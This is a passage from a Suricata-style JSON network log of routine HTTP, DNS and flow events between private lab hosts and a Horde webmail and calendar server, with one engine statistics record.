Firefox\/73.0","http_content_type":"application\/json","http_refer":"http:\/\/mail.spiral.com\/imp\/dynamic.php?page=mailbox","http_method":"POST","protocol":"HTTP\/1.1","status":200,"length":1840},"app_proto":"http","fileinfo":{"filename":"\/services\/ajax.php\/imp\/showMessage","state":"CLOSED","stored":false,"size":244,"tx_id":3}} {"timestamp":"2020-02-29T00:11:36.257907+0000","flow_id":1202052566297535,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52724,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/services\/ajax.php\/imp\/showMessage","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/json","http_refer":"http:\/\/mail.spiral.com\/imp\/dynamic.php?page=mailbox","http_method":"POST","protocol":"HTTP\/1.1","status":200,"length":1840},"app_proto":"http","fileinfo":{"filename":"\/services\/ajax.php\/imp\/showMessage","state":"CLOSED","stored":false,"size":4763,"tx_id":3}} {"timestamp":"2020-02-29T00:11:36.259305+0000","flow_id":150206485572827,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52726,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/imp\/themes\/default\/graphics\/reply.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/imp\/themes\/default\/dynamic\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":248},"app_proto":"http","fileinfo":{"filename":"\/imp\/themes\/default\/graphics\/reply.png","state":"CLOSED","stored":false,"size":248,"tx_id":1}} {"timestamp":"2020-02-29T00:11:36.259648+0000","flow_id":150206485572827,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52726,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":2,"http":{"hostname":"mail.spiral.com","url":"\/imp\/themes\/default\/graphics\/arrow_collapsed.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/imp\/themes\/default\/dynamic\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":234}} {"timestamp":"2020-02-29T00:11:36.260038+0000","flow_id":1202052566297535,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52724,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":4,"http":{"hostname":"mail.spiral.com","url":"\/imp\/themes\/default\/graphics\/plus.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/imp\/themes\/default\/dynamic\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":485}} {"timestamp":"2020-02-29T00:11:36.261237+0000","flow_id":150206485572827,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52726,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/imp\/themes\/default\/graphics\/arrow_collapsed.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/imp\/themes\/default\/dynamic\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":234},"app_proto":"http","fileinfo":{"filename":"\/imp\/themes\/default\/graphics\/arrow_collapsed.png","state":"CLOSED","stored":false,"size":234,"tx_id":2}} {"timestamp":"2020-02-29T00:11:36.263342+0000","flow_id":1202052566297535,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52724,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/imp\/themes\/default\/graphics\/plus.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/imp\/themes\/default\/dynamic\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":485},"app_proto":"http","fileinfo":{"filename":"\/imp\/themes\/default\/graphics\/plus.png","state":"CLOSED","stored":false,"size":485,"tx_id":4}} {"timestamp":"2020-02-29T00:11:36.305361+0000","flow_id":1202052566297535,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52724,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":5,"http":{"hostname":"mail.spiral.com","url":"\/imp\/themes\/default\/graphics\/download.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/imp\/themes\/default\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":297}} {"timestamp":"2020-02-29T00:11:36.305392+0000","flow_id":150206485572827,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52726,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":3,"http":{"hostname":"mail.spiral.com","url":"\/imp\/themes\/default\/graphics\/print.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/imp\/themes\/default\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":349}} {"timestamp":"2020-02-29T00:11:37.000761+0000","flow_id":826869973231761,"event_type":"flow","src_ip":"192.168.10.122","src_port":35205,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":2,"pkts_toclient":1,"bytes_toserver":255,"bytes_toclient":141,"start":"2020-02-29T00:06:31.436369+0000","end":"2020-02-29T00:06:36.553564+0000","age":5,"state":"established","reason":"timeout","alerted":false}} {"timestamp":"2020-02-29T00:11:37.019053+0000","flow_id":146057546899732,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.130","dest_port":34796,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/services\/portal\/","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/kronolith\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":6624},"app_proto":"http","fileinfo":{"filename":"\/services\/portal\/","state":"CLOSED","stored":false,"size":31912,"tx_id":0}} {"timestamp":"2020-02-29T00:11:38.244392+0000","flow_id":402321488552,"in_iface":"eth0","event_type":"dns","src_ip":"192.168.10.122","src_port":34159,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","dns":{"type":"query","id":36850,"rrname":"130.10.168.192.in-addr.arpa","rrtype":"PTR","tx_id":0}} {"timestamp":"2020-02-29T00:11:38.352829+0000","flow_id":402321488552,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":34159,"proto":"UDP","dns":{"type":"answer","id":36850,"rcode":"NXDOMAIN","rrname":"130.10.168.192.in-addr.arpa"}} {"timestamp":"2020-02-29T00:11:38.352829+0000","flow_id":402321488552,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":34159,"proto":"UDP","dns":{"type":"answer","id":36850,"rcode":"NXDOMAIN","rrname":"168.192.IN-ADDR.ARPA","rrtype":"SOA","ttl":20864}} {"timestamp":"2020-02-29T00:11:38.920615+0000","flow_id":701495603006587,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.130","src_port":34800,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":0,"http":{"hostname":"mail.spiral.com","url":"\/kronolith\/","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/services\/portal\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":24340}} {"timestamp":"2020-02-29T00:11:39.182692+0000","flow_id":701495603006587,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.130","dest_port":34800,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/kronolith\/","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/services\/portal\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":24340},"app_proto":"http","fileinfo":{"filename":"\/kronolith\/","state":"TRUNCATED","stored":false,"size":106496,"tx_id":0}} {"timestamp":"2020-02-29T00:11:39.193045+0000","flow_id":2068545038709269,"in_iface":"eth0","event_type":"dns","src_ip":"192.168.10.122","src_port":46427,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","dns":{"type":"query","id":19489,"rrname":"130.10.168.192.in-addr.arpa","rrtype":"PTR","tx_id":0}} {"timestamp":"2020-02-29T00:11:39.300002+0000","flow_id":128482540935253,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.130","dest_port":34798,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/services\/portal\/","http_user_agent":"Mozilla\/5.0 (X11; Linux x86_64) AppleWebKit\/537.36 (KHTML, like Gecko) Ubuntu Chromium\/77.0.3865.90 HeadlessChrome\/77.0.3865.90 Safari\/537.36","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/kronolith\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":6982},"app_proto":"http","fileinfo":{"filename":"\/services\/portal\/","state":"CLOSED","stored":false,"size":37765,"tx_id":0}} {"timestamp":"2020-02-29T00:11:39.301552+0000","flow_id":2068545038709269,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":46427,"proto":"UDP","dns":{"type":"answer","id":19489,"rcode":"NXDOMAIN","rrname":"130.10.168.192.in-addr.arpa"}} {"timestamp":"2020-02-29T00:11:39.301552+0000","flow_id":2068545038709269,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":46427,"proto":"UDP","dns":{"type":"answer","id":19489,"rcode":"NXDOMAIN","rrname":"168.192.IN-ADDR.ARPA","rrtype":"SOA","ttl":20864}} {"timestamp":"2020-02-29T00:11:39.336042+0000","flow_id":701495603006587,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.130","src_port":34800,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":1,"http":{"hostname":"mail.spiral.com","url":"\/services\/ajax.php\/kronolith\/listCalendars","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/json","http_refer":"http:\/\/mail.spiral.com\/kronolith\/","http_method":"POST","protocol":"HTTP\/1.1","status":200,"length":629}} {"timestamp":"2020-02-29T00:11:39.336042+0000","flow_id":701495603006587,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.130","src_port":34800,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/services\/ajax.php\/kronolith\/listCalendars","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/json","http_refer":"http:\/\/mail.spiral.com\/kronolith\/","http_method":"POST","protocol":"HTTP\/1.1","status":200,"length":629},"app_proto":"http","fileinfo":{"filename":"\/services\/ajax.php\/kronolith\/listCalendars","state":"CLOSED","stored":false,"size":29,"tx_id":1}} {"timestamp":"2020-02-29T00:11:39.380794+0000","flow_id":701495603006587,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.130","dest_port":34800,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/services\/ajax.php\/kronolith\/listCalendars","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/json","http_refer":"http:\/\/mail.spiral.com\/kronolith\/","http_method":"POST","protocol":"HTTP\/1.1","status":200,"length":629},"app_proto":"http","fileinfo":{"filename":"\/services\/ajax.php\/kronolith\/listCalendars","state":"CLOSED","stored":false,"size":1644,"tx_id":1}} {"timestamp":"2020-02-29T00:11:39.390757+0000","flow_id":1991905642280549,"in_iface":"eth0","event_type":"dns","src_ip":"192.168.10.122","src_port":57395,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","dns":{"type":"query","id":39025,"rrname":"130.10.168.192.in-addr.arpa","rrtype":"PTR","tx_id":0}} {"timestamp":"2020-02-29T00:11:39.498900+0000","flow_id":1991905642280549,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":57395,"proto":"UDP","dns":{"type":"answer","id":39025,"rcode":"NXDOMAIN","rrname":"130.10.168.192.in-addr.arpa"}} {"timestamp":"2020-02-29T00:11:39.498900+0000","flow_id":1991905642280549,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":57395,"proto":"UDP","dns":{"type":"answer","id":39025,"rcode":"NXDOMAIN","rrname":"168.192.IN-ADDR.ARPA","rrtype":"SOA","ttl":20864}} {"timestamp":"2020-02-29T00:11:39.525557+0000","flow_id":787184495559925,"in_iface":"eth0","event_type":"dns","src_ip":"192.168.10.122","src_port":53470,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","dns":{"type":"query","id":5490,"rrname":"130.10.168.192.in-addr.arpa","rrtype":"PTR","tx_id":0}} {"timestamp":"2020-02-29T00:11:39.535760+0000","flow_id":150206485572827,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52726,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/imp\/themes\/default\/graphics\/print.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/imp\/themes\/default\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":349},"app_proto":"http","fileinfo":{"filename":"\/imp\/themes\/default\/graphics\/print.png","state":"CLOSED","stored":false,"size":349,"tx_id":3}} {"timestamp":"2020-02-29T00:11:39.536000+0000","flow_id":150206485572827,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52726,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":4,"http":{"hostname":"mail.spiral.com","url":"\/imp\/themes\/default\/graphics\/arrow_expanded.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/imp\/themes\/default\/dynamic\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":227}} {"timestamp":"2020-02-29T00:11:39.535374+0000","flow_id":1202052566297535,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52724,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/imp\/themes\/default\/graphics\/download.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/imp\/themes\/default\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":297},"app_proto":"http","fileinfo":{"filename":"\/imp\/themes\/default\/graphics\/download.png","state":"CLOSED","stored":false,"size":297,"tx_id":5}} {"timestamp":"2020-02-29T00:11:39.535761+0000","flow_id":1202052566297535,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52724,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":6,"http":{"hostname":"mail.spiral.com","url":"\/imp\/themes\/default\/graphics\/newwin.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/imp\/themes\/default\/dynamic\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":316}} {"timestamp":"2020-02-29T00:11:39.634046+0000","flow_id":787184495559925,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":53470,"proto":"UDP","dns":{"type":"answer","id":5490,"rcode":"NXDOMAIN","rrname":"130.10.168.192.in-addr.arpa"}} {"timestamp":"2020-02-29T00:11:39.634046+0000","flow_id":787184495559925,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":53470,"proto":"UDP","dns":{"type":"answer","id":5490,"rcode":"NXDOMAIN","rrname":"168.192.IN-ADDR.ARPA","rrtype":"SOA","ttl":20864}} {"timestamp":"2020-02-29T00:11:39.691269+0000","flow_id":701495603006587,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.130","src_port":34800,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":2,"http":{"hostname":"mail.spiral.com","url":"\/services\/ajax.php\/kronolith\/listEvents","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/json","http_refer":"http:\/\/mail.spiral.com\/kronolith\/","http_method":"POST","protocol":"HTTP\/1.1","status":200,"length":608}} {"timestamp":"2020-02-29T00:11:39.691269+0000","flow_id":701495603006587,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.130","src_port":34800,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/services\/ajax.php\/kronolith\/listEvents","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/json","http_refer":"http:\/\/mail.spiral.com\/kronolith\/","http_method":"POST","protocol":"HTTP\/1.1","status":200,"length":608},"app_proto":"http","fileinfo":{"filename":"\/services\/ajax.php\/kronolith\/listEvents","state":"CLOSED","stored":false,"size":128,"tx_id":2}} {"timestamp":"2020-02-29T00:11:39.696995+0000","flow_id":1062938575886898,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.130","src_port":34802,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":0,"http":{"hostname":"mail.spiral.com","url":"\/services\/ajax.php\/kronolith\/listEvents","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/json","http_refer":"http:\/\/mail.spiral.com\/kronolith\/","http_method":"POST","protocol":"HTTP\/1.1","status":200,"length":126}} {"timestamp":"2020-02-29T00:11:39.696995+0000","flow_id":1062938575886898,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.130","src_port":34802,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/services\/ajax.php\/kronolith\/listEvents","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/json","http_refer":"http:\/\/mail.spiral.com\/kronolith\/","http_method":"POST","protocol":"HTTP\/1.1","status":200,"length":126},"app_proto":"http","fileinfo":{"filename":"\/services\/ajax.php\/kronolith\/listEvents","state":"CLOSED","stored":false,"size":137,"tx_id":0}} {"timestamp":"2020-02-29T00:11:40.136642+0000","flow_id":1085409844794818,"in_iface":"eth0","event_type":"dns","src_ip":"192.168.10.122","src_port":48282,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","dns":{"type":"query","id":19706,"rrname":"130.10.168.192.in-addr.arpa","rrtype":"PTR","tx_id":0}} {"timestamp":"2020-02-29T00:11:40.244904+0000","flow_id":1085409844794818,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":48282,"proto":"UDP","dns":{"type":"answer","id":19706,"rcode":"NXDOMAIN","rrname":"130.10.168.192.in-addr.arpa"}} {"timestamp":"2020-02-29T00:11:40.244904+0000","flow_id":1085409844794818,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":48282,"proto":"UDP","dns":{"type":"answer","id":19706,"rcode":"NXDOMAIN","rrname":"168.192.IN-ADDR.ARPA","rrtype":"SOA","ttl":20864}} {"timestamp":"2020-02-29T00:11:40.356634+0000","flow_id":1573653137124388,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.130","src_port":34804,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":0,"http":{"hostname":"mail.spiral.com","url":"\/mnemo\/","http_user_agent":"Mozilla\/5.0 (X11; Linux x86_64) AppleWebKit\/537.36 (KHTML, like Gecko) Ubuntu Chromium\/77.0.3865.90 HeadlessChrome\/77.0.3865.90 Safari\/537.36","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/services\/portal\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":5018}} {"timestamp":"2020-02-29T00:11:41.000189+0000","event_type":"stats","stats":{"uptime":14353,"capture":{"kernel_packets":134731,"kernel_drops":0},"decoder":{"pkts":134769,"bytes":92953515,"invalid":185,"ipv4":133284,"ipv6":8,"ethernet":134769,"raw":0,"null":0,"sll":0,"tcp":128038,"udp":5046,"sctp":0,"icmpv4":15,"icmpv6":8,"ppp":0,"pppoe":0,"gre":0,"vlan":0,"vlan_qinq":0,"teredo":0,"ipv4_in_ipv6":0,"ipv6_in_ipv6":0,"mpls":0,"avg_pkt_size":689,"max_pkt_size":1486,"erspan":0,"ipraw":{"invalid_ip_version":0},"ltnull":{"pkt_too_small":0,"unsupported_type":0},"dce":{"pkt_too_small":0}},"flow":{"memcap":0,"spare":10000,"emerg_mode_entered":0,"emerg_mode_over":0,"tcp_reuse":0,"memuse":7098496},"defrag":{"ipv4":{"fragments":0,"reassembled":0,"timeouts":0},"ipv6":{"fragments":0,"reassembled":0,"timeouts":0},"max_frag_hits":0},"tcp":{"sessions":2750,"ssn_memcap_drop":0,"pseudo":344,"pseudo_failed":0,"invalid_checksum":0,"no_flow":0,"syn":2766,"synack":2757,"rst":1199,"segment_memcap_drop":0,"stream_depth_reached":0,"reassembly_gap":142,"memuse":819200,"reassembly_memuse":12281632},"detect":{"alert":24},"app_layer":{"flow":{"http":1791,"ftp":0,"smtp":0,"tls":761,"ssh":0,"imap":0,"msn":0,"smb":0,"dcerpc_tcp":0,"dns_tcp":0,"failed_tcp":103,"dcerpc_udp":0,"dns_udp":2304,"failed_udp":111},"tx":{"http":4609,"smtp":0,"tls":0,"dns_tcp":0,"dns_udp":2383}},"flow_mgr":{"closed_pruned":2727,"new_pruned":15,"est_pruned":2352,"bypassed_pruned":0,"flows_checked":1,"flows_notimeout":1,"flows_timeout":0,"flows_timeout_inuse":0,"flows_removed":0,"rows_checked":65536,"rows_skipped":65534,"rows_empty":1,"rows_busy":0,"rows_maxlen":1},"dns":{"memuse":22816,"memcap_state":0,"memcap_global":0},"http":{"memuse":200557,"memcap":0}}} {"timestamp":"2020-02-29T00:11:42.000260+0000","flow_id":157748428880946,"event_type":"flow","src_ip":"192.168.10.122","src_port":46214,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":86,"bytes_toclient":141,"start":"2020-02-29T00:06:41.867378+0000","end":"2020-02-29T00:06:41.975863+0000","age":0,"state":"established","reason":"timeout","alerted":false}} {"timestamp":"2020-02-29T00:11:42.767232+0000","flow_id":921415108703488,"in_iface":"eth0","event_type":"dns","src_ip":"192.168.10.122","src_port":59394,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","dns":{"type":"query","id":17983,"rrname":"81.10.168.192.in-addr.arpa","rrtype":"PTR","tx_id":0}} {"timestamp":"2020-02-29T00:11:42.798805+0000","flow_id":1202052566297535,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52724,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/imp\/themes\/default\/graphics\/newwin.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/imp\/themes\/default\/dynamic\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":316},"app_proto":"http","fileinfo":{"filename":"\/imp\/themes\/default\/graphics\/newwin.png","state":"CLOSED","stored":false,"size":316,"tx_id":6}} {"timestamp":"2020-02-29T00:11:42.875378+0000","flow_id":921415108703488,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":59394,"proto":"UDP","dns":{"type":"answer","id":17983,"rcode":"NXDOMAIN","rrname":"81.10.168.192.in-addr.arpa"}} {"timestamp":"2020-02-29T00:11:42.875378+0000","flow_id":921415108703488,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":59394,"proto":"UDP","dns":{"type":"answer","id":17983,"rcode":"NXDOMAIN","rrname":"168.192.IN-ADDR.ARPA","rrtype":"SOA","ttl":20864}} {"timestamp":"2020-02-29T00:11:42.947886+0000","flow_id":1202052566297535,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52724,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":7,"http":{"hostname":"mail.spiral.com","url":"\/imp\/dynamic.php?page=message&buid=2&mailbox=SU5CT1g&token=t178Jy_bOFAgZYI5pak0cNw&uniq=1582935102499","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/imp\/dynamic.php?page=mailbox","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":6710}} {"timestamp":"2020-02-29T00:11:43.000367+0000","flow_id":446408885986074,"event_type":"flow","src_ip":"192.168.10.122","src_port":43798,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":87,"bytes_toclient":142,"start":"2020-02-29T00:06:42.582426+0000","end":"2020-02-29T00:06:42.690395+0000","age":0,"state":"established","reason":"timeout","alerted":false}} {"timestamp":"2020-02-29T00:11:43.012531+0000","flow_id":1202052566297535,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52724,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/imp\/dynamic.php?page=message&buid=2&mailbox=SU5CT1g&token=t178Jy_bOFAgZYI5pak0cNw&uniq=1582935102499","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/imp\/dynamic.php?page=mailbox","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":6710},"app_proto":"http","fileinfo":{"filename":"\/imp\/dynamic.php","state":"CLOSED","stored":false,"size":23757,"tx_id":7}} {"timestamp":"2020-02-29T00:11:43.014870+0000","flow_id":150206485572827,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52726,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/imp\/themes\/default\/graphics\/arrow_expanded.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/imp\/themes\/default\/dynamic\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":227},"app_proto":"http","fileinfo":{"filename":"\/imp\/themes\/default\/graphics\/arrow_expanded.png","state":"CLOSED","stored":false,"size":227,"tx_id":4}} {"timestamp":"2020-02-29T00:11:43.015159+0000","flow_id":150206485572827,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52726,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":5,"http":{"hostname":"mail.spiral.com","url":"\/js\/textarearesize.js?v=dc442439853f80a9467ce727c08e9b0e","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 